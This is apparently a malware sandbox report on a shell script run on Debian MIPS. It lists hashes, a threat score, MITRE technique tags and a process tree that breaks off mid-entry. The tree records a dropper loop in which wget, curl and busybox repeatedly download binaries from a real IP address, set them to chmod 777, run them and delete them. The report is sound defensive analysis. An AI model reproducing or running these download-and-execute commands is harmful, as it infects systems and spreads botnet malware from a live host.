c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e

Analysis

max time kernel
96s
max time network
100s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 03:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
Size

10KB
MD5

cdd6a3d3e08f6df591f6736ed154c56c
SHA1

00357309d336d5264e16b373b6fdc3db2287f423
SHA256

c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e
SHA512

a0d9d2d0062a61b310633386b50680c48f52bca237df9bd40713b36bcc03157b57c0ee83b84bb7866ae7793f20503979f421f49466d7cb30d4cb72b8d9575395
SSDEEP

192:7URUBUxUGUaUGaygHDpneNHSttLGyeWufzapURUBUxUGUaUWaygHDDpttLGMeWuO:1eNH+eWufzaFeWufza

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
738	chmod
818	chmod
932	chmod
938	chmod
763	chmod
920	chmod
926	chmod
974	chmod
944	chmod
787	chmod
860	chmod
872	chmod
968	chmod
878	chmod
884	chmod
914	chmod
980	chmod
950	chmod
836	chmod
890	chmod
896	chmod
962	chmod
902	chmod
956	chmod
812	chmod
866	chmod
746	chmod
908	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	curl
File opened for modification	/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	curl
File opened for modification	/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	curl
File opened for modification	/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	curl
File opened for modification	/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	curl
File opened for modification	/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	curl
File opened for modification	/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	curl
File opened for modification	/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	curl
File opened for modification	/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	curl
File opened for modification	/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	curl
File opened for modification	/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	curl
File opened for modification	/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	curl
File opened for modification	/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	curl
File opened for modification	/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	curl
File opened for modification	/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	curl
File opened for modification	/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	curl
File opened for modification	/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	curl
File opened for modification	/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	curl
File opened for modification	/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	curl
File opened for modification	/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	curl
File opened for modification	/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	curl
File opened for modification	/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	curl
File opened for modification	/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	curl
File opened for modification	/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	curl
File opened for modification	/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	curl
File opened for modification	/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	curl
File opened for modification	/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	curl
File opened for modification	/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	curl

/tmp/c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
/tmp/c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
1⤵
PID:708
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:712
- /usr/bin/wget
  wget http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:717
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:726
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:734
- /bin/chmod
  chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  ./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Executes dropped EXE
  PID:740
- /bin/rm
  rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:741
- /usr/bin/wget
  wget http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:742
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:745
- /bin/chmod
  chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  ./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:748
- /usr/bin/wget
  wget http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:749
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:752
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:759
- /bin/chmod
  chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  ./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Executes dropped EXE
  PID:765
- /bin/rm
  rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:768
- /usr/bin/wget
  wget http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:769
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:776
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:784
- /bin/chmod
  chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  ./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Executes dropped EXE
  PID:788
- /bin/rm
  rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:792
- /usr/bin/wget
  wget http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:794
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:802
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:808
- /bin/chmod
  chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  ./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Executes dropped EXE
  PID:813
- /bin/rm
  rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:814
- /usr/bin/wget
  wget http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:815
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:817
- /bin/chmod
  chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  ./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Executes dropped EXE
  PID:819
- /bin/rm
  rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:820
- /usr/bin/wget
  wget http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:821
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:822
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:829
- /bin/chmod
  chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  ./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Executes dropped EXE
  PID:837
- /bin/rm
  rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:840
- /usr/bin/wget
  wget http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:841
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:848
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:856
- /bin/chmod
  chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  ./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:862
- /usr/bin/wget
  wget http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:863
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:865
- /bin/chmod
  chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  ./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Executes dropped EXE
  PID:867
- /bin/rm
  rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:868
- /usr/bin/wget
  wget http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:869
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:870
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:871
- /bin/chmod
  chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  ./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Executes dropped EXE
  PID:873
- /bin/rm
  rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:874
- /usr/bin/wget
  wget http://216.126.231.240/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:875
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:876
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:877
- /bin/chmod
  chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  ./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Executes dropped EXE
  PID:879
- /bin/rm
  rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:880
- /usr/bin/wget
  wget http://216.126.231.240/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:881
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:882
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:883
- /bin/chmod
  chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  ./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:886
- /usr/bin/wget
  wget http://216.126.231.240/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:887
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:889
- /bin/chmod
  chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  ./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:892
- /usr/bin/wget
  wget http://216.126.231.240/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:893
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:895
- /bin/chmod
  chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  ./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:898
- /usr/bin/wget
  wget http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:899
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:901
- /bin/chmod
  chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  ./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:904
- /usr/bin/wget
  wget http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:905
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:907
- /bin/chmod
  chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  ./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Executes dropped EXE
  PID:909
- /bin/rm
  rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:910
- /usr/bin/wget
  wget http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:911
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:913
- /bin/chmod
  chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - File and Directory Permissions Modification
  PID:914
- /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  ./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Executes dropped EXE
  PID:915
- /bin/rm
  rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:916
- /usr/bin/wget
  wget http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:917
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:918
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:919
- /bin/chmod
  chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  ./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:922
- /usr/bin/wget
  wget http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:923
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:924
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:925
- /bin/chmod
  chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  ./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:928
- /usr/bin/wget
  wget http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:929
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:931
- /bin/chmod
  chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - File and Directory Permissions Modification
  PID:932
- /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  ./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Executes dropped EXE
  PID:933
- /bin/rm
  rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:934
- /usr/bin/wget
  wget http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:935
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:936
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:937
- /bin/chmod
  chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - File and Directory Permissions Modification
  PID:938
- /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  ./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Executes dropped EXE
  PID:939
- /bin/rm
  rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:940
- /usr/bin/wget
  wget http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:941
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:942
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:943
- /bin/chmod
  chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  ./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:946
- /usr/bin/wget
  wget http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:947
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:949
- /bin/chmod
  chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - File and Directory Permissions Modification
  PID:950
- /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  ./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Executes dropped EXE
  PID:951
- /bin/rm
  rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:952
- /usr/bin/wget
  wget http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:953
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:954
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:955
- /bin/chmod
  chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - File and Directory Permissions Modification
  PID:956
- /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  ./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Executes dropped EXE
  PID:957
- /bin/rm
  rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:958
- /usr/bin/wget
  wget http://216.126.231.240/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:959
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:960
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:961
- /bin/chmod
